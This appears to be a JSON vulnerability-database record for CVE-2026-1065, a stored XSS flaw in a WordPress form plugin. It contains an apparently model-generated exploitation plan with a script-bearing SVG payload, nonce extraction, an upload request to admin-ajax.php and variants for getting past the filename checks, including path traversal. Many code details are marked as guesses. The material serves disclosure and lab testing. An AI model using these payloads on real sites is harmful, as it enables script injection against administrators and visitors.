[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAzFSsvjSHzEw0VjicB7YCoJ8inYw2VY7I8G43J32Qqk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-1065","form-maker-by-10web-unauthenticated-stored-cross-site-scripting-via-svg-file","Form Maker by 10Web \u003C= 1.15.35 - Unauthenticated Stored Cross-Site Scripting via SVG file","The Form Maker by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.15.35. This is due to the plugin's default file upload allowlist including SVG files combined with weak substring-based extension validation. This makes it possible for unauthenticated attackers to upload malicious SVG files containing JavaScript code that will execute when viewed by administrators or site visitors via file upload fields in forms granted they can submit forms.","form-maker",null,"\u003C=1.15.35","1.15.36","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Unrestricted Upload of File with Dangerous Type","2026-02-02 18:12:37","2026-02-03 06:38:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8230d5f8-01d9-465a-8a43-e9852248bb3d?source=api-prod",1,[],"researched",false,3,"This research plan outlines the process for exploiting a Stored Cross-Site Scripting (XSS) vulnerability in **Form Maker by 10Web** (\u003C= 1.15.35) via malicious SVG file uploads.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability arises because the plugin allows unauthenticated users to upload SVG files through form fields. While the plugin attempts to validate file extensions, its validation logic is weak (likely substring-based or improperly configured allowlist), and it fails to sanitize the content of SVG files. Since SVG is an XML-based image format, it can embed `\u003Cscript>` tags. When an administrator views the submission or a visitor accesses the file URL directly, the embedded JavaScript executes in the context of the site.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `admin-ajax.php` (for unauthenticated form submission).\n*   **Action:** `wp_ajax_nopriv_form_maker_submit_form` or `form_maker_save` (inferred).\n*   **Payload Parameter:** A `multipart\u002Fform-data` file upload field associated with a specific form.\n*   **Preconditions:**\n    *   A form must be created that includes a \"File Upload\" field.\n    *   The \"Allow Extensions\" setting for that field must include `svg` (which is often allowed by default or easily bypassed due to weak validation).\n    *   The form must be published on a public-facing page.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** `FormMakerController::form_maker_submit_form` (or similar AJAX handler) is triggered via `admin-ajax.php`.\n2.  **Form Processing:** The plugin identifies the form ID from the request and retrieves field definitions.\n3.  **Upload Handling:** The plugin iterates through `$_FILES`. It calls a validation function (likely in `models\u002FFormMakerModel.php` or a dedicated upload class).\n4.  **Weak Validation:** The extension check likely uses a pattern like `if (strpos($file_name, '.svg') !== false)` or includes `svg` in a default `$allowed_extensions` array without subsequent sanitization via `kses` or a dedicated SVG sanitizer.\n5.  **Storage:** The file is moved to `wp-content\u002Fuploads\u002Fform-maker-uploads\u002F` using `move_uploaded_file`.\n6.  **Persistence:** The file path is stored in the `{prefix}_form_maker_submits` table.\n7.  **Sink:** When the uploaded file URL is visited, the browser renders the SVG and executes the script.\n\n### 4. Nonce Acquisition Strategy\nThe Form Maker plugin typically requires a nonce for form submission to prevent CSRF, even for unauthenticated users.\n\n1.  **Identify Shortcode:** The plugin uses `[formmaker id=\"ID_HERE\"]`.\n2.  **Setup Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Contact\" --post_status=publish --post_content='[formmaker id=\"1\"]'\n    ```\n3.  **Navigate:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:**\n    The plugin usually localizes script data. Use `browser_eval` to find the nonce:\n    *   Variable Name (Inferred): `window.fm_object_1` or `window.form_maker_obj`.\n    *   Key (Inferred): `nonce` or `form_maker_submit_nonce`.\n    *   Command: `browser_eval(\"window.fm_object_1?.nonce\")`\n5.  **Identify Field Names:** In the browser, inspect the file upload field's `name` attribute. It usually follows the pattern `form_id_temp_1` or `type_file_X`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Create the Malicious SVG\nCreate a file named `xss.svg`:\n```xml\n\u003C?xml version=\"1.0\" standalone=\"no\"?>\n\u003C!DOCTYPE svg PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD SVG 1.1\u002F\u002FEN\" \"http:\u002F\u002Fwww.w3.org\u002FGraphics\u002FSVG\u002F1.1\u002FDTD\u002Fsvg11.dtd\">\n\u003Csvg version=\"1.1\" baseProfile=\"full\" xmlns=\"http:\u002F\u002Fwww.w3.org\u002F2000\u002Fsvg\">\n   \u003Crect width=\"300\" height=\"100\" style=\"fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)\" \u002F>\n   \u003Cscript type=\"text\u002Fjavascript\">\n      alert('CVE-2026-1065 XSS');\n   \u003C\u002Fscript>\n\u003C\u002Fsvg>\n```\n\n#### Step 2: Submit the Form\nPerform a `multipart\u002Fform-data` POST request to `admin-ajax.php`.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (Multipart):**\n    *   `action`: `form_maker_submit_form` (verify via `grep -r \"wp_ajax_nopriv\"`)\n    *   `form_id`: `1`\n    *   `nonce`: `[EXTRACTED_NONCE]`\n    *   `type_file_1`: `xss.svg` (The file upload field)\n    *   `submit_form_1`: `1`\n\n#### Step 3: Triggering XSS\n1.  Navigate to the WordPress Admin dashboard: `wp-admin\u002Fadmin.php?page=submissions_fm`.\n2.  Select the form and view the latest submission.\n3.  Click the link to the uploaded file, or copy the file URL and visit it directly.\n\n### 6. Test Data Setup\n1.  **Initialize Form:**\n    The plugin creates default forms on activation. Ensure Form ID 1 exists.\n2.  **Add File Upload Field:**\n    If Form 1 doesn't have a file upload field, use `wp eval` to add one to the form's metadata or use the plugin's logic to insert a field into the `form_maker` table.\n    *   Field Type: `type_file`\n    *   Allowed Extensions: `svg,jpg,jpeg,png`\n3.  **Publish Page:**\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_content='[formmaker id=\"1\"]'\n    ```\n\n### 7. Expected Results\n*   The server response should indicate a successful submission (e.g., `{\"status\":\"success\"}` or a redirect\u002Fsuccess message HTML).\n*   The file `xss.svg` should exist in `wp-content\u002Fuploads\u002Fform-maker-uploads\u002F`.\n*   Directly accessing the SVG file URL in the browser should trigger an `alert()` box.\n\n### 8. Verification Steps\n1.  **Check Filesystem:**\n    ```bash\n    ls -R \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fform-maker-uploads\u002F | grep xss.svg\n    ```\n2.  **Check Database Submissions:**\n    ```bash\n    wp db query \"SELECT * FROM wp_form_maker_submits ORDER BY id DESC LIMIT 1;\"\n    ```\n3.  **Check Response Headers:**\n    Verify the file is served as `image\u002Fsvg+xml`.\n\n### 9. Alternative Approaches\n*   **Extension Bypass:** If `.svg` is blocked, try `xss.svg.php` (if the check is substring-based) or `xss.svg.` (trailing dot).\n*   **Double Extension:** `xss.jpg.svg`.\n*   **SVG via XML:** If the upload handler checks the file header for \"real\" images, ensure the SVG starts with `\u003C?xml` or `\u003Csvg`.\n*   **Path Traversal:** Check if the filename parameter in the multipart request allows path traversal (e.g., `filename=\"..\u002F..\u002F..\u002Fxss.svg\"`) to move the file outside the restricted directory.","The Form Maker by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to 1.15.35 due to unsafe handling of SVG uploads. The plugin's file upload validation fails to sanitize SVG content and uses weak extension checks, allowing unauthenticated attackers to upload SVG files containing malicious JavaScript that executes when accessed by a user or administrator.","1. Identify a public page containing a Form Maker form with a file upload field.\n2. Extract the necessary submission nonce and form ID, which are typically localized in JavaScript objects such as `fm_object_1` on the page.\n3. Create a malicious SVG file containing an embedded JavaScript payload, such as: \u003Csvg xmlns=\"http:\u002F\u002Fwww.w3.org\u002F2000\u002Fsvg\">\u003Cscript>alert('XSS')\u003C\u002Fscript>\u003C\u002Fsvg>.\n4. Submit a multipart\u002Fform-data POST request to the WordPress AJAX endpoint (admin-ajax.php) using the action `form_maker_submit_form` (or the corresponding AJAX handler) with the nonce, form ID, and the malicious SVG file attached to the file upload parameter.\n5. Locate the resulting file path (typically within wp-content\u002Fuploads\u002Fform-maker-uploads\u002F) and access the URL directly, or wait for an administrator to view the submission in the plugin's 'Submissions' dashboard to trigger the script execution.","gemini-3-flash-preview","2026-04-27 17:05:15","2026-04-27 17:06:26",{"type":32,"vulnerable_version":33,"fixed_version":11,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":36,"fixed_zip":37,"all_tags":38},"plugin","1.15.35","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.35","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.35.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags\u002F1.15.36","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fform-maker.1.15.36.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fform-maker\u002Ftags"]